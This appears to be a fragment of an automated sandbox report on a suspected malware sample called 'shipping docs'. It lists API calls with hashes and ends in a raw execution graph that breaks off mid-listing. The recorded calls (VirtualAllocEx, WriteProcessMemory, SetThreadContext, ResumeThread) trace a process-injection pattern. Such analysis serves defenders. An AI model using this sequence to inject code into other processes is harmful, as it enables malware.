                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: c71a1ed44948d0fdb1311f0b7e4cc40d222a3ea0b4dec575ca47552353bd8c67
                                                                                              • Instruction ID: 24de47384032ba47ea63fd039064842573aba23f8de62aa1b3fe6f9e5993b8db
                                                                                              • Opcode Fuzzy Hash: c71a1ed44948d0fdb1311f0b7e4cc40d222a3ea0b4dec575ca47552353bd8c67
                                                                                              • Instruction Fuzzy Hash: B421E4B59003499FDB10CF99D584BEEBBF4FB48324F14846AE958A7310D374A954CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04483235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 809edf81b596cecee492263f94a0436659e36a8f484f34a0359addd0a00bf62b
                                                                                              • Instruction ID: 9c8284d23a43369fe71637fe0a47b4c9c81c55e0478c44916e3a06f19acf646a
                                                                                              • Opcode Fuzzy Hash: 809edf81b596cecee492263f94a0436659e36a8f484f34a0359addd0a00bf62b
                                                                                              • Instruction Fuzzy Hash: 0121E0B19002599FCF10DF9AD885BDEFBF4FB48314F10842AE958A7350D778A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B7B71E,?,?,?,?,?), ref: 00B7B7DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 8a833c34e780bd5a69e7988b3abc505b6d4598bf2f4fddabc8075e4d1b3fa113
                                                                                              • Instruction ID: 7822b7298efbdd5f365b308ab9bd27634ad063455969ec8254c8b24dad4ec846
                                                                                              • Opcode Fuzzy Hash: 8a833c34e780bd5a69e7988b3abc505b6d4598bf2f4fddabc8075e4d1b3fa113
                                                                                              • Instruction Fuzzy Hash: 572112B69002499FDB00CFAAD584BDEFBF4FB48324F14846AE918A3310D374A945CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 04482FE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 2420f22e8e7375a73b79898dfd27e7276085bba92ea909846d5f5736f6244eb3
                                                                                              • Instruction ID: 644639b1f54ab9ff2eba0ce76989857d9a6ae035d798aec539a614ec72d55306
                                                                                              • Opcode Fuzzy Hash: 2420f22e8e7375a73b79898dfd27e7276085bba92ea909846d5f5736f6244eb3
                                                                                              • Instruction Fuzzy Hash: CC2113B190025A9FCB00CF9AD485BEEFBB4FB48224F14816AE418A7641D778A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 044830AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: a94043baf994872b5a3d5ac36918fa9254fcc52b8a73e111f994bfb597253b94
                                                                                              • Instruction ID: de28cb2844e4b753484de2abc2e348312523cef5e29fd0c246512941fc87c0cd
                                                                                              • Opcode Fuzzy Hash: a94043baf994872b5a3d5ac36918fa9254fcc52b8a73e111f994bfb597253b94
                                                                                              • Instruction Fuzzy Hash: 5521D0B59012599FCB10CF9AD884BDEFBF4FB49320F10842AE958A7350D379A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 044830AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 9c6cf8d5910cce794b69283269e2398a250de19683f9975d88e8ca17c71578d7
                                                                                              • Instruction ID: a38462c2c869083b5f3fd483e39ba8a10fd7978bb5902c8c074be34912f5f2a6
                                                                                              • Opcode Fuzzy Hash: 9c6cf8d5910cce794b69283269e2398a250de19683f9975d88e8ca17c71578d7
                                                                                              • Instruction Fuzzy Hash: BA21DBB59012599FCB10CF9AD884BDEBBF4FB48320F10842AE958A7250D379A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 04482FE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 8cd94b052337220a5a4128c93ee31497c59e0fe15c35ffa07cb40ac44deba743
                                                                                              • Instruction ID: d1586d4db009b330cb9cf766981347efa0297e3daafe39e328bf5098800c33b1
                                                                                              • Opcode Fuzzy Hash: 8cd94b052337220a5a4128c93ee31497c59e0fe15c35ffa07cb40ac44deba743
                                                                                              • Instruction Fuzzy Hash: D921F4B1D0025A9BCB00CF9AD885B9EFBB4BB48224F14816AE518A7741D778A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0448316B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 62245fbd66e99c1e6dee64297a793e9cae4944b8a2d75b0d7f1c4e1cb77ccf20
                                                                                              • Instruction ID: 95f020f2c1f6d3a236838bc69526f8ccd7ceb5ed3a3c936ea0707576c0bbe932
                                                                                              • Opcode Fuzzy Hash: 62245fbd66e99c1e6dee64297a793e9cae4944b8a2d75b0d7f1c4e1cb77ccf20
                                                                                              • Instruction Fuzzy Hash: 702156B18043889FCB11CF99C884BDEBFF4EF4A724F14845AE958A7251C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B79809,00000800,00000000,00000000), ref: 00B79A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 0701fd57303665962b224a2a90c0d23153ba49522d18b23b69362a846cdc531d
                                                                                              • Instruction ID: 3d782916fb485f485a394d1f5bf6f08cfa3c251a7e638111eec5ec4f5036e16f
                                                                                              • Opcode Fuzzy Hash: 0701fd57303665962b224a2a90c0d23153ba49522d18b23b69362a846cdc531d
                                                                                              • Instruction Fuzzy Hash: 4C11F2B29002499BDB10CF9AD484ADEFBF4EB48364F14846AE969A7200C374A945CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B79809,00000800,00000000,00000000), ref: 00B79A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: d6d4956c5c01fb64e43ea29cc9458d61d47bbf6c3f7b4a0c00d838c4a23671dc
                                                                                              • Instruction ID: f856d19675ebfd4c5a34da249f84958fc820bb0009921aca3211f53fc2e698cc
                                                                                              • Opcode Fuzzy Hash: d6d4956c5c01fb64e43ea29cc9458d61d47bbf6c3f7b4a0c00d838c4a23671dc
                                                                                              • Instruction Fuzzy Hash: BF1112B28002498FCB10CF9AD484BDEFBF4EB88324F14846AD569B7200C375A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00B7FC88,?,?,?,?), ref: 00B7FCFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: bc009be1a79ccd195b39c086b600899fd4af3502bb8558fe775e901a3e451b4e
                                                                                              • Instruction ID: edd68dfbdf481190341cb4092d18c5852c2bb678507b498af65909b79617231b
                                                                                              • Opcode Fuzzy Hash: bc009be1a79ccd195b39c086b600899fd4af3502bb8558fe775e901a3e451b4e
                                                                                              • Instruction Fuzzy Hash: DD1125B58002498FDB10CF99D585BDEFBF4EB48324F20841AD818A7300C3B4AA45CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0448316B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: ff9a5479aac0ba769fb74f7617e9aed49327fbe0cd0021b30c1e5d1882fb5df4
                                                                                              • Instruction ID: c2157047578c3ded13903cd4dfe93f5ca5fb0c743807d06533f8e7ff8cb16c8f
                                                                                              • Opcode Fuzzy Hash: ff9a5479aac0ba769fb74f7617e9aed49327fbe0cd0021b30c1e5d1882fb5df4
                                                                                              • Instruction Fuzzy Hash: 9411E0B59002499FCB10DF9AD884BDFBBF4FB48724F14841AE968A7250C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7938E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 953e2f79bec56184cddcbad05eaffd05f2b6566060d916c6300ee04683e0adec
                                                                                              • Instruction ID: f84fbeee898c8e22ee6cd9adff1d7643c3b49961153a3c5c74da20971382507d
                                                                                              • Opcode Fuzzy Hash: 953e2f79bec56184cddcbad05eaffd05f2b6566060d916c6300ee04683e0adec
                                                                                              • Instruction Fuzzy Hash: FB110FB2C002498FCB10CF9AD444BDEFBF4EB88324F15846AD429A7640C374A545CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00B7FC88,?,?,?,?), ref: 00B7FCFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 64dca840cbbae746878c84da090e01a967e39f907371c24bb137a1f569e338e1
                                                                                              • Instruction ID: 902fdbd69abecc1d7f04fc5f088a069c0e8454aa0a2aecbc7fa12e0705d8418a
                                                                                              • Opcode Fuzzy Hash: 64dca840cbbae746878c84da090e01a967e39f907371c24bb137a1f569e338e1
                                                                                              • Instruction Fuzzy Hash: D5110AB58003499FDB10CF99D584BDEFBF8EB48324F14845AD955A7340C3B4A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: f0eac682efb203eb336d04fdd7eac1930c8cf26bdfa7a360a9a086f3fe8b0d1d
                                                                                              • Instruction ID: 225a3e706f31081ed5045c8ebe3e61eea1546f9a000a48c3fc372d259b496775
                                                                                              • Opcode Fuzzy Hash: f0eac682efb203eb336d04fdd7eac1930c8cf26bdfa7a360a9a086f3fe8b0d1d
                                                                                              • Instruction Fuzzy Hash: 611133B59002498FCB10CF99D484BDEBBF4EB48324F24881AD959A7300C775A941CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04483C6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 6aa8931f93f382fd7a4ffed631d4a62bc2988a452b4dd7464ced2862b697e7be
                                                                                              • Instruction ID: 6037160ebe3f41af667e405ab12d2d7c44c7d9fc891a90980e5e4b1492f51ee8
                                                                                              • Opcode Fuzzy Hash: 6aa8931f93f382fd7a4ffed631d4a62bc2988a452b4dd7464ced2862b697e7be
                                                                                              • Instruction Fuzzy Hash: 2311D0B58003499FDB10DF99D888BDFBBF8EB58724F14841AE955A7600C375A984CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 0a9d3a7240f42bd7824e25c1c299bc899a25b51f6360eaee97cf782a5a7b1ce3
                                                                                              • Instruction ID: 2742cce919fbf0b9d23d055b03dce96e702a8ff2853e1f64808c753d074797a5
                                                                                              • Opcode Fuzzy Hash: 0a9d3a7240f42bd7824e25c1c299bc899a25b51f6360eaee97cf782a5a7b1ce3
                                                                                              • Instruction Fuzzy Hash: 0E1112B18002498FCB10DF9AD488BDFFBF4EB48324F20841AD559A7740C775A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_97d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83a6230256b990637c6ab5eae2b70f0873b653dda3a7fed790a8d57a9f2c4d5c
                                                                                              • Instruction ID: 47387fc64bd6faefdef791794669dbd8dad3651594b5f30f66f4f6a58b42ecba
                                                                                              • Opcode Fuzzy Hash: 83a6230256b990637c6ab5eae2b70f0873b653dda3a7fed790a8d57a9f2c4d5c
                                                                                              • Instruction Fuzzy Hash: 172125B2504240DFDB11CF14D9C0B26BF75FF88328F24C569E90A4B25AC33AE846CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef17f38896539ec513df289934042c5f27a7e8f2445f6d2193a262cd55adbc8d
                                                                                              • Instruction ID: c6d9bbb640d135a73192b7e0147dd8abc3f93bceb5f1448125d11abf2d16511b
                                                                                              • Opcode Fuzzy Hash: ef17f38896539ec513df289934042c5f27a7e8f2445f6d2193a262cd55adbc8d
                                                                                              • Instruction Fuzzy Hash: 212107B1504244DFDB14EF14D8C4B26BB65FB84314F24C96DD9494B386C33AD847CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6fe28c06e5b7ed72ed9658356b425f56744e9832150547138cc9ccaf21feb88a
                                                                                              • Instruction ID: 14dbff1d11c0c1a824b7d5b8380cd9735409f3e0b6f72e7d0e461efa4939a038
                                                                                              • Opcode Fuzzy Hash: 6fe28c06e5b7ed72ed9658356b425f56744e9832150547138cc9ccaf21feb88a
                                                                                              • Instruction Fuzzy Hash: 4B21F5B1504244DFDB05EF14D5C0F26BBA5FB84314F24CA69D9494B386C33AD846CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ced31335bd9abff96b7d13da3f9dce7e6510f4b78d06b3c37d8fd68161457a3
                                                                                              • Instruction ID: f2cd306d56b3b4b82b16ceec75cacfb3ab1e4bd43475ada7fd8cada18ff943aa
                                                                                              • Opcode Fuzzy Hash: 9ced31335bd9abff96b7d13da3f9dce7e6510f4b78d06b3c37d8fd68161457a3
                                                                                              • Instruction Fuzzy Hash: CE2180755093C08FDB12CF20D994715BF71EB46314F28C5DAD8498B697C33A980ACB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              Execution Graph

Execution Coverage: 19.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0.6%
Total number of Nodes: 802
Total number of Limit Nodes: 28
execution_graph
2 API calls 50416->50419 50417 61fa130 50420 66f6c78 3 API calls 50417->50420 50421 66f6b36 3 API calls 50417->50421 50422 66f6f64 3 API calls 50417->50422 50423 66f6f10 3 API calls 50417->50423 50418 61fa532 50418->50228 50419->50417 50420->50418 50421->50418 50422->50418 50423->50418 50424->50413 50425->50416 50427 61fa1a1 50426->50427 50429 66f6c78 3 API calls 50427->50429 50430 66f6b36 3 API calls 50427->50430 50431 66f6f64 3 API calls 50427->50431 50432 66f6f10 3 API calls 50427->50432 50428 61fa532 50428->50228 50429->50428 50430->50428 50431->50428 50432->50428 50434 61fa22b 50433->50434 50436 66f6c78 3 API calls 50434->50436 50437 66f6b36 3 API calls 50434->50437 50438 66f6f64 3 API calls 50434->50438 50439 66f6f10 3 API calls 50434->50439 50435 61fa532 50435->50228 50436->50435 50437->50435 50438->50435 50439->50435 50441 61fa2ac 50440->50441 50443 66f6c78 3 API calls 50441->50443 50444 66f6b36 3 API calls 50441->50444 50445 66f6f64 3 API calls 50441->50445 50446 66f6f10 3 API calls 50441->50446 50442 61fa532 50442->50228 50443->50442 50444->50442 50445->50442 50446->50442 50448 61fa32d 50447->50448 50450 66f6c78 3 API calls 50448->50450 50451 66f6b36 3 API calls 50448->50451 50452 66f6f64 3 API calls 50448->50452 50453 66f6f10 3 API calls 50448->50453 50449 61fa532 50449->50228 50450->50449 50451->50449 50452->50449 50453->50449 50455 61fa2f1 50454->50455 50457 66f6c78 3 API calls 50455->50457 50458 66f6b36 3 API calls 50455->50458 50459 66f6f64 3 API calls 50455->50459 50460 66f6f10 3 API calls 50455->50460 50456 61fa532 50456->50228 50457->50456 50458->50456 50459->50456 50460->50456 50462 61fa372 50461->50462 50464 66f6c78 3 API calls 50462->50464 50465 66f6b36 3 API calls 50462->50465 50466 66f6f64 3 API calls 50462->50466 50467 66f6f10 3 API calls 50462->50467 50463 61fa532 50463->50228 50464->50463 50465->50463 50466->50463 50467->50463 50469 61f9e77 50468->50469 50482 684da38 LdrInitializeThunk 50469->50482 50470 61fa01c KiUserExceptionDispatcher 
50472 61fa0bf 50470->50472 50476 684e9d8 2 API calls 50472->50476 50473 61fa0eb 50477 684f240 2 API calls 50473->50477 50474 61fa130 50478 66f6c78 3 API calls 50474->50478 50479 66f6b36 3 API calls 50474->50479 50480 66f6f64 3 API calls 50474->50480 50481 66f6f10 3 API calls 50474->50481 50475 61fa532 50475->50228 50476->50473 50477->50474 50478->50475 50479->50475 50480->50475 50481->50475 50482->50470 50484 61f9f01 50483->50484 50495 684da38 LdrInitializeThunk 50484->50495 50485 61fa01c KiUserExceptionDispatcher 50487 61fa0bf 50485->50487 50496 684e9d8 2 API calls 50487->50496 50488 61fa0eb 50497 684f240 2 API calls 50488->50497 50489 61fa130 50491 66f6c78 3 API calls 50489->50491 50492 66f6b36 3 API calls 50489->50492 50493 66f6f64 3 API calls 50489->50493 50494 66f6f10 3 API calls 50489->50494 50490 61fa532 50490->50228 50491->50490 50492->50490 50493->50490 50494->50490 50495->50485 50496->50488 50497->50489 50499 61f9f82 50498->50499 50506 684da38 LdrInitializeThunk 50499->50506 50500 61fa01c KiUserExceptionDispatcher 50502 61fa0bf 50500->50502 50507 684e9d8 2 API calls 50502->50507 50503 61fa0eb 50508 684f240 2 API calls 50503->50508 50504 61fa130 50509 66f6c78 3 API calls 50504->50509 50510 66f6b36 3 API calls 50504->50510 50511 66f6f64 3 API calls 50504->50511 50512 66f6f10 3 API calls 50504->50512 50505 61fa532 50505->50228 50506->50500 50507->50503 50508->50504 50509->50505 50510->50505 50511->50505 50512->50505 50514 61fa402 50513->50514 50516 66f6c78 3 API calls 50514->50516 50517 66f6b36 3 API calls 50514->50517 50518 66f6f64 3 API calls 50514->50518 50519 66f6f10 3 API calls 50514->50519 50515 61fa532 50515->50228 50516->50515 50517->50515 50518->50515 50519->50515 50521 61fa486 50520->50521 50523 66f6c78 3 API calls 50521->50523 50524 66f6b36 3 API calls 50521->50524 50525 66f6f64 3 API calls 50521->50525 50526 66f6f10 3 API calls 50521->50526 50522 61fa532 50522->50228 50523->50522 50524->50522 50525->50522 50526->50522 50528 61f9c87 50527->50528 
50529 61f9d24 KiUserExceptionDispatcher 50528->50529 50530 61f9d40 50529->50530 50541 684da38 LdrInitializeThunk 50530->50541 50531 61fa01c KiUserExceptionDispatcher 50533 61fa0bf 50531->50533 50542 684e9d8 2 API calls 50533->50542 50534 61fa0eb 50543 684f240 2 API calls 50534->50543 50535 61fa130 50537 66f6c78 3 API calls 50535->50537 50538 66f6b36 3 API calls 50535->50538 50539 66f6f64 3 API calls 50535->50539 50540 66f6f10 3 API calls 50535->50540 50536 61fa532 50536->50228 50537->50536 50538->50536 50539->50536 50540->50536 50541->50531 50542->50534 50543->50535 50545 61fa00c 50544->50545 50556 684da38 LdrInitializeThunk 50545->50556 50546 61fa01c KiUserExceptionDispatcher 50548 61fa0bf 50546->50548 50557 684e9d8 2 API calls 50548->50557 50549 61fa0eb 50558 684f240 2 API calls 50549->50558 50550 61fa130 50552 66f6c78 3 API calls 50550->50552 50553 66f6b36 3 API calls 50550->50553 50554 66f6f64 3 API calls 50550->50554 50555 66f6f10 3 API calls 50550->50555 50551 61fa532 50551->50228 50552->50551 50553->50551 50554->50551 50555->50551 50556->50546 50557->50549 50558->50550 50560 61fa08d KiUserExceptionDispatcher 50559->50560 50562 61fa0bf 50560->50562 50566 684e9d8 2 API calls 50562->50566 50563 61fa0eb 50567 684f240 2 API calls 50563->50567 50564 61fa130 50568 66f6c78 3 API calls 50564->50568 50569 66f6b36 3 API calls 50564->50569 50570 66f6f64 3 API calls 50564->50570 50571 66f6f10 3 API calls 50564->50571 50565 61fa532 50565->50228 50566->50563 50567->50564 50568->50565 50569->50565 50570->50565 50571->50565 50573 61fa0d2 50572->50573 50577 684e9d8 2 API calls 50573->50577 50574 61fa0eb 50578 684f240 2 API calls 50574->50578 50575 61fa130 50579 66f6c78 3 API calls 50575->50579 50580 66f6b36 3 API calls 50575->50580 50581 66f6f64 3 API calls 50575->50581 50582 66f6f10 3 API calls 50575->50582 50576 61fa532 50576->50228 50577->50574 50578->50575 50579->50576 50580->50576 50581->50576 50582->50576 50584 61f92d8 50583->50584 50936 61fb5c1 50584->50936 50943 
